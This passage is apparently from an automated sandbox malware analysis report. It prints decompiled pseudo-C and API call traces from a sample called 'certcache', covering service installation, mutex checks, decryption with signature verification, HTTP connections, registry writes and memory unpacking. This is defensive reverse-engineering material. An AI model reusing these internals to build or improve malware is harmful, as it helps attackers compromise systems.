    • WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
    • CloseHandle.KERNEL32(?), ref: 001AA7CC
    • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
    • HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 75%
    			E001A198D() {
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				void* _t15;
    
    				L001A1830(_t11, _t12);
    				_t13 =  *(_t15 - 4);
    				 *0x1ac20c(_t15 - 0x20c, 0x104, _t13, 0x1ac7c0, _t13);
    				HeapFree(GetProcessHeap(), 0, _t13);
    				return DeleteFileW(_t15 - 0x20c);
    			}
    APIs
    • _snwprintf.NTDLL ref: 001A19A8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A19B4
    • HeapFree.KERNEL32(00000000), ref: 001A19BB
    • DeleteFileW.KERNEL32(?), ref: 001A19C8
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 73%
    			E001A891E(unsigned char* __eax, long __ebx, void* __edi, void* __esi) {
    				long _t10;
    				long _t12;
    				void* _t14;
    				void* _t17;
    
    				L0:
    				while(1) {
    					L0:
    					_t14 = __edi;
    					_t12 = __ebx;
    					 *__eax =  *__eax >> 1;
    					 *__eax =  *__eax;
    					VirtualFree( *(__esi + 8), 0, ??);
    					CloseHandle( *(__esi + 0x10));
    					 *__edi =  *__esi;
    					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
    					while(1) {
    						L4:
    						_t17 =  *_t14;
    						if(_t17 == 0) {
    							break;
    						}
    						L1:
    						_t10 = WaitForSingleObject( *(_t17 + 0x10), _t12);
    						if(_t10 == 0x102) {
    							L3:
    							_t14 = _t17;
    						} else {
    							L2:
    							goto 0x1b1734;
    							asm("int3");
    							asm("int3");
    							_push( *((intOrPtr*)(_t17 + 8)));
    							goto L0;
    						}
    					}
    					L5:
    					return _t10;
    					L6:
    				}
    			}
    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 001A8908
    • VirtualFree.KERNEL32(?,00000000), ref: 001A892B
    • CloseHandle.KERNEL32(?), ref: 001A8934
    • GetProcessHeap.KERNEL32(00000000), ref: 001A8941
    • HeapFree.KERNEL32(00000000), ref: 001A8948
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 35%
    			E001A866C(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
    				void* _t10;
    				void _t28;
    				intOrPtr _t31;
    				void* _t32;
    				void* _t35;
    				intOrPtr* _t40;
    				void* _t42;
    				void* _t44;
    
    				_t40 = __edi;
    				_t32 = __ebx;
    				if(L001A1E80(_t10, __ecx, __edx) != 0) {
    					goto 0x1b168c;
    					asm("int3");
    					asm("int3");
    					if(L001A2560(__edx, _t40) != 0) {
    						_t35 =  *(_t44 - 0x10);
    						_t28 =  *_t35;
    						 *_t32 = _t28;
    						if(_t28 < 0x4000000) {
    							_push(_t32);
    							_t31 = L001A8500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
    							_t35 =  *(_t44 - 0x10);
    							 *_t40 = _t31;
    						}
    						HeapFree(GetProcessHeap(), 0, _t35);
    					}
    					HeapFree(GetProcessHeap(), ??, ??);
    				}
    				 *0x1ac260( *((intOrPtr*)(_t44 - 0x30)));
    				 *0x1ac260( *((intOrPtr*)(_t44 - 0x34)));
    				 *0x1ac260( *((intOrPtr*)(_t44 - 0x38)));
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t42);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t40 != 0x00000000;
    			}
    APIs
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A86F1
    • HeapFree.KERNEL32(00000000), ref: 001A86F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A8701
    • HeapFree.KERNEL32(00000000), ref: 001A8708
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 73%
    			E001A8B2C(unsigned char* __eax, void* __ebx, void* __edi, void* __esi) {
    				long _t10;
    				void* _t13;
    				void* _t16;
    
    				L0:
    				while(1) {
    					L0:
    					_t13 = __edi;
    					 *__eax =  *__eax >> 1;
    					 *__eax =  *__eax;
    					VirtualFree( *(__esi + 8), 0, ??);
    					CloseHandle( *(__esi + 0x10));
    					 *__edi =  *__esi;
    					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
    					while(1) {
    						L4:
    						_t16 =  *_t13;
    						if(_t16 == 0) {
    							break;
    						}
    						L1:
    						_t10 = WaitForSingleObject( *(_t16 + 0x10), 0xffffffff);
    						if(_t10 == 0x102) {
    							L3:
    							_t13 = _t16;
    						} else {
    							L2:
    							goto 0x1b17f6;
    							asm("int3");
    							asm("int3");
    							_push( *((intOrPtr*)(_t16 + 8)));
    							goto L0;
    						}
    					}
    					L5:
    					return _t10;
    					L6:
    				}
    			}
    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001A8B16
    • VirtualFree.KERNEL32(?,00000000), ref: 001A8B39
    • CloseHandle.KERNEL32(?), ref: 001A8B42
    • GetProcessHeap.KERNEL32(00000000), ref: 001A8B4F
    • HeapFree.KERNEL32(00000000), ref: 001A8B56
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 22%
    			E001A8656(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
    				void _t28;
    				intOrPtr _t31;
    				void* _t32;
    				void* _t35;
    				void* _t37;
    				intOrPtr* _t40;
    				void* _t42;
    				void* _t44;
    
    				_t40 = __edi;
    				_t37 = __edx;
    				_t32 = __ebx;
    				if(L001A1D40(__ecx) != 0) {
    					goto 0x1b1674;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					if(L001A1E80(_t10, __ecx, _t37) != 0) {
    						goto 0x1b168c;
    						asm("int3");
    						asm("int3");
    						if(L001A2560(_t37, _t40) != 0) {
    							_t35 =  *(_t44 - 0x10);
    							_t28 =  *_t35;
    							 *_t32 = _t28;
    							if(_t28 < 0x4000000) {
    								_push(_t32);
    								_t31 = L001A8500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
    								_t35 =  *(_t44 - 0x10);
    								 *_t40 = _t31;
    							}
    							HeapFree(GetProcessHeap(), 0, _t35);
    						}
    						HeapFree(GetProcessHeap(), ??, ??);
    					}
    					 *0x1ac260( *((intOrPtr*)(_t44 - 0x30)));
    				}
    				 *0x1ac260( *((intOrPtr*)(_t44 - 0x34)));
    				 *0x1ac260( *((intOrPtr*)(_t44 - 0x38)));
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t42);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t40 != 0x00000000;
    			}
    APIs
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A86F1
    • HeapFree.KERNEL32(00000000), ref: 001A86F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A8701
    • HeapFree.KERNEL32(00000000), ref: 001A8708
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    APIs
    • GetProcessHeap.KERNEL32 ref: 001A992A
    • HeapFree.KERNEL32(00000000), ref: 001A9931
    • GetProcessHeap.KERNEL32(00000000,?,?,00000001), ref: 001A994A
    • HeapFree.KERNEL32(00000000), ref: 001A9951
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

    Execution Graph

    Execution Coverage:7.5%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:12%
    Total number of Nodes:542
    Total number of Limit Nodes:29

    Graph

6616 139d82 GetProcessHeap HeapFree 6615->6616 6617 131830 6616->6617 6618 139dad LoadLibraryW 6617->6618 6619 131b10 6618->6619 6620 139dd2 GetProcessHeap HeapFree 6619->6620 6621 131830 6620->6621 6622 139dfd LoadLibraryW 6621->6622 6623 131b10 6622->6623 6624 139e22 GetProcessHeap HeapFree 6623->6624 6625 131830 6624->6625 6626 139e4d LoadLibraryW 6625->6626 6627 131b10 6626->6627 6628 139e72 GetProcessHeap HeapFree 6627->6628 6629 131830 6628->6629 6630 139e9d LoadLibraryW 6629->6630 6631 131b10 6630->6631 6632 139ec2 GetProcessHeap HeapFree 6631->6632 6633 131830 6632->6633 6634 139eed LoadLibraryW 6633->6634 6635 131b10 6634->6635 6636 139f12 GetProcessHeap HeapFree 6635->6636 6637 139f2a 6636->6637 6646 139f9d memset GetProcessHeap HeapFree 6647 1315b0 6646->6647 6648 139fbb ExitProcess 6647->6648 6821 139705 GetTempPathW GetTempFileNameW SHFileOperationW 6822 139746 6821->6822 6824 139772 6821->6824 6823 13974f SHFileOperationW 6822->6823 6822->6824 6823->6824 6992 132236 GetProcessHeap HeapFree 6825 1318e8 memset 6826 1318fb 6825->6826 6827 13a450 DuplicateTokenEx CloseHandle 6828 13a45f 6827->6828 6829 131e8c HttpQueryInfoW 6830 131eb3 6829->6830 6999 13961e 7000 139625 6999->7000 7001 13962d _snprintf GetProcessHeap HeapFree 7000->7001 7002 13965b 7001->7002 6993 1398ec QueryServiceConfig2W 6994 139908 CloseServiceHandle 6993->6994 6995 1398f9 GetProcessHeap HeapFree 6993->6995 6996 139890 6994->6996 6995->6994 6997 139922 6996->6997 6998 139898 OpenServiceW 6996->6998 6998->6996 6669 138bfa GetModuleFileNameW lstrlenW 6670 138c4e 6669->6670 6671 138c98 GetProcessHeap RtlAllocateHeap 6670->6671 6673 138c80 lstrlenW 6670->6673 6672 138d04 6671->6672 6674 138cb8 6671->6674 6673->6673 6675 138c93 6673->6675 6674->6672 6676 138cc0 lstrcmpiW 6674->6676 6675->6671 6676->6674 6677 138ccf lstrcpyW lstrlenW 6676->6677 6677->6674 7003 1389db 7004 1389e3 7003->7004 7005 138ad0 7004->7005 7006 138a41 GetProcessHeap RtlAllocateHeap 7004->7006 7007 138a80 CreateThread 
7004->7007 7006->7004 7007->7004 7008 138aab 7007->7008 6699 139346 GetVolumeInformationW 6700 13935b 6699->6700 6703 139370 GetModuleFileNameW OpenSCManagerW 6700->6703 6702 139360 6704 1393b0 GetProcessHeap RtlAllocateHeap 6703->6704 6705 1393a2 CloseServiceHandle 6703->6705 6706 1393d9 lstrlen 6704->6706 6705->6704 6708 139404 6706->6708 7009 13850c GetProcessHeap RtlAllocateHeap 7010 138528 7009->7010 7011 138555 7009->7011 7010->7011 7012 13853c GetProcessHeap HeapFree 7010->7012 6831 1399fa 6832 131830 6831->6832 6833 139a1f _snwprintf 6832->6833 6834 139a42 6833->6834 7013 138b0d 7014 138b11 WaitForSingleObject 7013->7014 7015 138b66 7013->7015 7016 138b23 7014->7016 7016->7014 7016->7015 7017 139c5c CreateProcessW 7018 139c66 7017->7018 7019 139c7e CloseHandle CloseHandle 7017->7019 7018->7019 6835 1397f3 EnumServicesStatusExW 6836 139818 GetLastError 6835->6836 6839 139829 6835->6839 6836->6839 6837 13996d CloseServiceHandle 6838 13995b 6839->6837 6839->6838 6840 1386c5 GetProcessHeap HeapFree 6841 1386d2 InternetCloseHandle 6840->6841 6842 1386db InternetCloseHandle InternetCloseHandle 6841->6842 6843 1386ed GetProcessHeap HeapFree GetProcessHeap HeapFree 6842->6843 6844 13870e 6843->6844 6518 1394c1 6519 131830 6518->6519 6520 1394c6 7 API calls 6519->6520 6521 1395a2 GetComputerNameW 6520->6521 6522 139549 6520->6522 6523 13965b 6521->6523 6524 1395c0 6521->6524 6522->6521 6525 1395fd GetProcessHeap RtlAllocateHeap 6524->6525 6526 1395ca 6524->6526 6527 139614 6525->6527 6528 13962a _snprintf GetProcessHeap HeapFree 6525->6528 6528->6523 6845 1395d0 6846 1395d8 6845->6846 6846->6845 6847 1395fd GetProcessHeap RtlAllocateHeap 6846->6847 6848 139614 6847->6848 6849 13962a _snprintf GetProcessHeap HeapFree 6847->6849 6851 13965b 6849->6851 6852 131a20 6853 131a35 6852->6853 6854 131be0 GetPEB 6853->6854 6855 131ad5 6854->6855 6856 13a86b 6859 13a870 6856->6859 6857 13a8cc 6859->6857 6860 13a6e0 GetProcessHeap RtlAllocateHeap 6859->6860 6861 13a704 memcpy 
GetProcessHeap RtlAllocateHeap 6860->6861 6862 13a791 6860->6862 6863 13a741 CreateThread 6861->6863 6864 13a781 GetProcessHeap HeapFree 6861->6864 6862->6859 6865 13a771 GetProcessHeap HeapFree 6863->6865 6866 13a761 6863->6866 6864->6862 6865->6864 6866->6859 7020 13191e GetFileAttributesW 7021 131900 7020->7021 6867 132b5f 6868 132b67 6867->6868 6871 132c0a 6867->6871 6869 132c35 memcpy 6868->6869 6868->6871 6872 132c83 6868->6872 6869->6872 6870 132cdb memcpy 6870->6871 6870->6872 6872->6870 6873 132d75 6872->6873 7022 138d46 WideCharToMultiByte 7023 138d53 GetProcessHeap HeapFree 7022->7023 6562 1385df 6563 131830 6562->6563 6564 1385e6 _snwprintf GetProcessHeap HeapFree 6563->6564 6565 13863e 6564->6565 6566 1386ed GetProcessHeap HeapFree GetProcessHeap HeapFree 6565->6566 6567 13870e 6566->6567 6568 139f42 6576 131be0 GetPEB 6568->6576 6570 139f47 6571 131be0 GetPEB 6570->6571 6572 139f6c 6571->6572 6573 139f78 GetProcessHeap RtlAllocateHeap 6572->6573 6574 139fbb ExitProcess 6573->6574 6575 139f95 6573->6575 6575->6574 6577 131bfc 6576->6577 6874 13992a GetProcessHeap HeapFree 6875 13993d ChangeServiceConfig2W GetProcessHeap HeapFree 6874->6875 6876 139957 6874->6876 6875->6876 6877 13996d CloseServiceHandle 6876->6877 6878 13995b 6876->6878 6879 1397dc OpenServiceW 6880 139957 6879->6880 6881 13996d CloseServiceHandle 6880->6881 6882 13995b 6880->6882 6883 131e50 GetLastError 6883->6883 6884 131e59 6883->6884 6885 13259b RtlAllocateHeap 6886 1325b4 CryptDuplicateHash 6885->6886 6887 132655 6885->6887 6888 1325d4 memcpy CryptDecrypt 6886->6888 6892 132633 GetProcessHeap HeapFree 6886->6892 6890 132604 CryptVerifySignatureW 6888->6890 6891 132626 CryptDestroyHash 6888->6891 6890->6891 6891->6887 6891->6892 6892->6887 6600 1384c0 6601 1384c9 6600->6601 6602 1384e9 6601->6602 6603 1384d0 GetProcessHeap HeapFree 6601->6603 7031 131932 CreateDirectoryW 7032 131900 7031->7032 7033 13193c GetLastError 7031->7033 7033->7032 6893 1316d3 memset CreateProcessW 6894 
131691 GetLastError 6893->6894 6895 131711 WaitForSingleObject CloseHandle CloseHandle CloseHandle CloseHandle 6893->6895 6897 1316a6 SetEvent CloseHandle CloseHandle 6894->6897 6898 1316cb 6894->6898 6899 1316c0 6897->6899 7038 13891e VirtualFree CloseHandle GetProcessHeap HeapFree 7041 138915 7038->7041 7039 138958 7040 138904 WaitForSingleObject 7040->7041 7041->7039 7041->7040 7034 13982e GetProcessHeap RtlAllocateHeap 7035 139848 7034->7035 7036 13996d CloseServiceHandle 7035->7036 7037 13995b 7035->7037 7042 139c6c Sleep 7043 139c77 7042->7043 7044 139c26 7042->7044 7045 139c30 GetLastError 7044->7045 7046 139c3f 7044->7046 7045->7044 6690 1390be memset 6691 131830 6690->6691 6692 1390e2 _snwprintf GetProcessHeap HeapFree CreateMutexW 6691->6692 6693 13929f CryptDestroyHash CryptDestroyKey CryptDestroyKey CryptReleaseContext 6692->6693 6694 139126 WaitForSingleObject 6692->6694 6695 1392d6 6693->6695 6696 139132 6694->6696 6697 13a7a0 4 API calls 6695->6697 6696->6693 6698 1392de 6697->6698 6709 131c60 memset ObtainUserAgentString 6710 131c8f 6709->6710 7047 13985f EnumServicesStatusExW 7048 139922 7047->7048 7049 13986d 7047->7049 7049->7048 7050 139898 OpenServiceW 7049->7050 7050->7049 6490 131d0f InternetConnectW 6491 131d1c 6490->6491 6492 131d2f InternetCloseHandle 6490->6492 6493 131d37 6492->6493 6494 122a02 6495 122a19 6494->6495 6500 121c91 VirtualAlloc 6495->6500 6497 122a3c 6502 122663 6497->6502 6501 121cee 6500->6501 6501->6497 6507 1223f0 VirtualAlloc 6502->6507 6504 1226ab 6505 122835 VirtualProtect 6504->6505 6506 122781 VirtualProtect 6504->6506 6505->6504 6506->6504 6508 1224be 6507->6508 6508->6504 7051 139c17 WriteFile CloseHandle 7053 139c24 7051->7053 7052 139c30 GetLastError 7052->7053 7053->7052 7054 139c3f 7053->7054 6904 138a5e 6905 138a63 6904->6905 6906 138a6a 6905->6906 6907 138abb GetProcessHeap HeapFree 6905->6907 6909 1389e3 6907->6909 6908 138ad0 6909->6908 6910 138a41 GetProcessHeap RtlAllocateHeap 6909->6910 6911 138a80 
CreateThread 6909->6911 6910->6909 6911->6906 6911->6909 7055 138966 7056 138973 7055->7056 7058 13899a 7055->7058 7056->7056 7057 13897c GetProcessHeap RtlAllocateHeap 7056->7057 7057->7058 6912 1397b3 CreateServiceW 6913 1397d7 6912->6913 7059 1385aa 7062 138740 7059->7062 7064 138753 GetProcessHeap RtlAllocateHeap 7062->7064 7065 1385af 7064->7065 7066 138799 memcpy 7064->7066 7066->7065 6914 1393e3 6915 1393ea 6914->6915 6916 1393f2 lstrlen 6915->6916 6917 139404 6916->6917 6545 1327c6 GetProcessHeap RtlAllocateHeap 6918 1382dc 6919 13833a 6918->6919 6920 138351 memset memset 6918->6920 6919->6920 6558 131e20 GetLastError 6558->6558 6559 131e29 HttpQueryInfoW 6558->6559 6560 131e4b 6559->6560 6561 131e63 InternetCloseHandle 6559->6561 6560->6561 6921 137469 memcpy 6922 137464 6921->6922 6578 1391f0 CreateEventW 6579 139229 ReleaseMutex CloseHandle 6578->6579 6580 1391ff SignalObjectAndWait 6578->6580 6583 13923b GetTickCount CreateTimerQueueTimer 6579->6583 6584 13929f CryptDestroyHash CryptDestroyKey CryptDestroyKey CryptReleaseContext 6579->6584 6581 13921b ResetEvent 6580->6581 6582 139214 6580->6582 6581->6579 6582->6579 6582->6581 6586 139278 WaitForSingleObject DeleteTimerQueueTimer 6583->6586 6587 139293 CloseHandle 6583->6587 6585 1392d6 6584->6585 6588 13a7a0 4 API calls 6585->6588 6586->6587 6587->6584 6589 1392de 6588->6589 7068 139a53 7069 131830 7068->7069 7070 139a5a RegCreateKeyExW 7069->7070 7071 139a7f RegSetValueExW RegCloseKey 7070->7071 7072 139aa9 7070->7072 7071->7072 6923 139793 OpenSCManagerW 6924 1397a6 6923->6924 6925 139960 StartServiceW CloseServiceHandle 6926 13996d CloseServiceHandle 6925->6926 6638 1324c8 CryptExportKey 6639 1324ec CryptDestroyHash 6638->6639 6641 132554 6639->6641 6642 132536 GetProcessHeap HeapFree 6639->6642 6642->6641 7081 138b78 7085 1319e0 7081->7085 7084 138b92 7086 1319ea GetCurrentProcessId 7085->7086 7086->7084 7077 138d12 WideCharToMultiByte 7078 138d1e GetProcessHeap RtlAllocateHeap 7077->7078 7080 
138d34 GetProcessHeap HeapFree 7077->7080 7078->7080 6651 138e20 GetTickCount 6652 138e3c 6651->6652 6655 138e52 6651->6655 6653 138ef4 6652->6653 6654 138e63 6652->6654 6652->6655 6657 138f10 lstrlen 6653->6657 6654->6655 6656 138e7e SetEvent 6654->6656 6658 138f40 6657->6658 6659 139035 GetProcessHeap HeapFree GetProcessHeap HeapFree 6658->6659 6661 139022 GetProcessHeap HeapFree 6658->6661 6663 13a7a0 4 API calls 6658->6663 6664 138fec GetProcessHeap HeapFree 6658->6664 6665 1388f0 6658->6665 6659->6658 6660 139063 GetTickCount GetProcessHeap HeapFree 6659->6660 6660->6655 6661->6659 6663->6658 6664->6661 6666 138958 6665->6666 6667 138904 WaitForSingleObject 6665->6667 6666->6658 6668 138915 6667->6668 6668->6666 6668->6667

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 22%
    			E001391F0(signed int __ecx) {
    				void* _t3;
    				long _t12;
    				long _t19;
    				int _t21;
    				signed int _t23;
    				void* _t25;
    				void* _t28;
    
    				_t23 = __ecx;
    				_t3 = CreateEventW(??, ??, ??, ??);
    				 *0x13c29c = _t3;
    				if(_t3 != 0) {
    					_t19 = SignalObjectAndWait(_t3,  *0x13c2a0, 0xffffffff, 0);
    					if(_t19 == 0 || _t19 == 0x80) {
    						_t21 = ResetEvent( *0x13c29c);
    					}
    				}
    				ReleaseMutex(_t25);
    				CloseHandle(_t25);
    				if(_t21 != 0) {
    					_t12 = GetTickCount(); // executed
    					_push(0x10);
    					_push(0x3e8);
    					_push(0x1388);
    					_push(0);
    					 *0x13c280 = 1;
    					_push(E00138E20);
    					 *0x13c278 = _t12 + 0x1388;
    					_push(0);
    					_push(_t28 - 8);
    					if( *0x13c188() != 0) {
    						WaitForSingleObject( *0x13c29c, 0xffffffff);
    						 *0x13c11c(0,  *((intOrPtr*)(_t28 - 8)), 0xffffffff);
    					}
    					CloseHandle( *0x13c29c);
    				}
    				 *0x13c048( *0x13c288);
    				CryptDestroyKey( *0x13c28c);
    				CryptDestroyKey( *0x13c290);
    				CryptReleaseContext( *0x13c284, 0);
    				E00138AE0(_t21);
    				return E0013A7A0(_t23 | 0xffffffff);
    			}











    APIs
    • CreateEventW.KERNEL32 ref: 001391F0
    • SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 0013920A
    • ResetEvent.KERNEL32 ref: 00139221
    • ReleaseMutex.KERNEL32 ref: 0013922A
    • CloseHandle.KERNEL32 ref: 00139231
    • GetTickCount.KERNEL32 ref: 0013923B
    • CreateTimerQueueTimer.KERNEL32(?,00000000,Function_00008E20,00000000,00001388,000003E8,00000010), ref: 0013926E
    • WaitForSingleObject.KERNEL32(000000FF), ref: 00139280
    • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 0013928D
    • CloseHandle.KERNEL32 ref: 00139299
    • CryptDestroyHash.ADVAPI32 ref: 001392A5
    • CryptDestroyKey.ADVAPI32 ref: 001392B1
    • CryptDestroyKey.ADVAPI32 ref: 001392BD
    • CryptReleaseContext.ADVAPI32(00000000), ref: 001392CB
      • Part of subcall function 0013A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
      • Part of subcall function 0013A7A0: CloseHandle.KERNEL32(?), ref: 0013A7CC
      • Part of subcall function 0013A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
      • Part of subcall function 0013A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 18%
    			E0013914E(void* __ecx, void* __edx, void* __eflags) {
    				void* _t21;
    				void* _t28;
    				long _t31;
    				long _t38;
    				int _t40;
    				void* _t47;
    				void* _t49;
    				void* _t50;
    				void* _t52;
    
    				asm("lahf");
    				asm("int3");
    				L00131830(__ecx, __edx);
    				_t49 =  *(_t52 - 4);
    				 *0x13c20c(_t52 - 0x188, 0x40, _t49,  *0x13c27c);
    				HeapFree(GetProcessHeap(), 0, _t49);
    				L00131830(0x131264, 0xc);
    				_t50 =  *(_t52 - 4);
    				 *0x13c20c(_t52 - 0x108, 0x40, _t50,  *0x13c27c, 0x4b85ca91, _t52 - 4);
    				HeapFree(GetProcessHeap(), 0, _t50);
    				_t21 = CreateMutexW(0, 0, _t52 - 0x108); // executed
    				 *0x13c2a0 = _t21;
    				if(_t21 != 0) {
    					goto 0x141924;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					_t28 = CreateEventW();
    					 *0x13c29c = _t28;
    					if(_t28 != 0) {
    						_t38 = SignalObjectAndWait(_t28,  *0x13c2a0, 0xffffffff, 0);
    						if(_t38 == 0 || _t38 == 0x80) {
    							_t40 = ResetEvent( *0x13c29c);
    						}
    					}
    					ReleaseMutex(_t47);
    					CloseHandle(_t47);
    					if(_t40 != 0) {
    						_t31 = GetTickCount(); // executed
    						_push(0x10);
    						_push(0x3e8);
    						_push(0x1388);
    						_push(0);
    						 *0x13c280 = 1;
    						_push(E00138E20);
    						 *0x13c278 = _t31 + 0x1388;
    						_push(0);
    						_push(_t52 - 8);
    						if( *0x13c188() != 0) {
    							WaitForSingleObject( *0x13c29c, 0xffffffff);
    							 *0x13c11c(0,  *((intOrPtr*)(_t52 - 8)), 0xffffffff);
    						}
    						CloseHandle( *0x13c29c);
    					}
    				}
    				 *0x13c048( *0x13c288);
    				CryptDestroyKey( *0x13c28c);
    				CryptDestroyKey( *0x13c290);
    				CryptReleaseContext( *0x13c284, 0);
    				E00138AE0(_t40);
    				return E0013A7A0(0xffffffffffffffff);
    			}













    APIs
    • _snwprintf.NTDLL ref: 00139168
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139174
    • HeapFree.KERNEL32(00000000), ref: 0013917B
    • _snwprintf.NTDLL ref: 001391AC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001391B8
    • HeapFree.KERNEL32(00000000), ref: 001391BF
    • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 001391D0
    • CryptDestroyHash.ADVAPI32 ref: 001392A5
    • CryptDestroyKey.ADVAPI32 ref: 001392B1
    • CryptDestroyKey.ADVAPI32 ref: 001392BD
    • CryptReleaseContext.ADVAPI32(00000000), ref: 001392CB
      • Part of subcall function 0013A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
      • Part of subcall function 0013A7A0: CloseHandle.KERNEL32(?), ref: 0013A7CC
      • Part of subcall function 0013A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
      • Part of subcall function 0013A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 17%
    			E001390BE(void* __eflags) {
    				void* _t22;
    				long _t29;
    				void* _t42;
    				void* _t43;
    				long _t46;
    				long _t53;
    				int _t55;
    				signed int _t57;
    				void* _t61;
    				void* _t63;
    				void* _t65;
    				void* _t66;
    				void* _t67;
    
    				_t55 = 0;
    				memset(0x13c284, 0, ??);
    				_t57 = 0x131364;
